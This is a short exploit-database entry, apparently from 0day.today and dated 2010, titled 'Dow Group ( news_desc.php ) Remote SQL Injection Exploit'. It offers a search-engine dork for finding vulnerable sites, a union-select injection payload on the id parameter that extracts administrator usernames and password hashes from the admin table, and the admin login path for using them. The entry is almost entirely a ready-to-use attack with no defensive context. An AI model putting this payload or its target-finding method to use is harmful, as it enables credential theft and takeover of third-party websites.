id: 10983
date: 02/19/2010
title: Dow Group ( news_desc.php ) Remote SQL Injection Exploit
author: GoLdeN-z3r0
cves: 

========================================================
Dow Group ( news_desc.php ) Remote SQL Injection Exploit
========================================================

# Dow Group ( news_desc.php ) Remote SQL Injection Exploit
#
# AUTHOR: GoLdeN-z3r0
#
# Script : Dow Group
#
# Dork: inurl:news_desc.php?id
#########################################
# Exploit in:
# news_desc.php?id=-99999999+union+select+1,concat(user_name,0x3a,password),3,4,5,6+from+admin
#
# adminlogin:
#
# www.[sitename].com/admin/
#



#  0day.today [2023-03-23]  #